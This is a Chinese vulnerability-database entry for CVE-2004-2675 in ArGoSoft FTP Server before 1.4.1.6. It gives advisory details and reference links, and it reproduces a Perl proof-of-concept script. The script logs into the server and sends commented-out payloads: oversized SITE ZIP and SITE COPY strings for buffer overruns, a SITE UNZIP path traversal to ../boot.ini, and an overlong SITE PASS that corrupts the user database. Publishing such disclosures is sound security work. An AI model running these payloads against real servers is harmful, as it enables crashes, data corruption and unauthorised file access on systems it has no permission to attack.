ArGoSoft FTP服务器多个漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107766 漏洞类型 未知
发布时间 2004-02-27 更新时间 2007-01-09
CVE编号 CVE-2004-2675 CNNVD-ID CNNVD-200412-336
漏洞平台 Windows CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/23769
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-336
|漏洞详情
ArGoSoftFTPServer1.4.1.6之前版本存在漏洞。远程攻击者可以借助带有超长密码参数的SITEPASS命令导致服务拒绝(崩溃),该漏洞导致数据库崩溃。
|漏洞EXP
source: http://www.securityfocus.com/bid/9770/info

ArGoSoft has released version 1.4.1.6 of their FTP Server to address multiple unspecified security vulnerabilities. These issues include three buffer overruns when handling overly long FTP SITE ZIP and SITE COPY commands, a file enumeration issue involving the SITE UNZIP command and user database corruption denial of service attacks via the SITE PASS command. 

#!/usr/bin/perl
# Multiple Vulnerabilities in ArGoSoft FTP Server version 1.4 (1.4.1.4)
# Created by Beyond Security Ltd. - All rights reserved.

use IO::Socket;

$host = "192.168.1.243";

$remote = IO::Socket::INET->new ( Proto => "tcp",
     PeerAddr => $host,
     PeerPort => "2119",,
    );

unless ($remote) { die "cannot connect to ftp daemon on $host" }

print "connected\n";
while (<$remote>)
{
 print $_;
 if (/220 /)
 {
  last;
 }
}


$remote->autoflush(1);

my $ftp = "USER username\r\n";

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/331 /)
 {
  last;
 }
}

$ftp = join("", "PASS ", "password", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/230 /)
 {
  last;
 }
}

#$ftp = join ("", "SITE ZIP ", "A"x512, "\r\n");
#$ftp = join ("", "SITE ZIP storm.zip /f:", "A"x2048, "\r\n");
#$ftp = join ("", "SITE COPY ", "A"x2048, " ", "A"x10, "\r\n");
#$ftp = join ("", "SITE UNZIP ", "../boot.ini\r\n"); # Directory Traversal (we know a certain file exists)
#$ftp = join ("", "SITE PASS ", "storm ", "A"x3500, "\r\n"); # DoS ... against the user database

#Choose one of the above to test the vulnerabilities mentioned

print $remote $ftp;
print $ftp;
sleep(1);

while (<$remote>)
{
 print $_;
 if (/250 Done/)
 {
  last;
 }
}

close $remote;
|参考资料

来源:BID
名称:9770
链接:http://www.securityfocus.com/bid/9770
来源:SECUNIA
名称:11002
链接:http://secunia.com/advisories/11002
来源:XF
名称:argosoftftp-site-pass-dos(15412)
链接:http://xforce.iss.net/xforce/xfdb/15412
来源:www.securiteam.com
链接:http://www.securiteam.com/windowsntfocus/5RP010KCAO.html
来源:OSVDB
名称:11332
链接:http://www.osvdb.org/11332
来源:www.argosoft.com
链接:http://www.argosoft.com/rootpages/FtpServer/ChangeList.aspx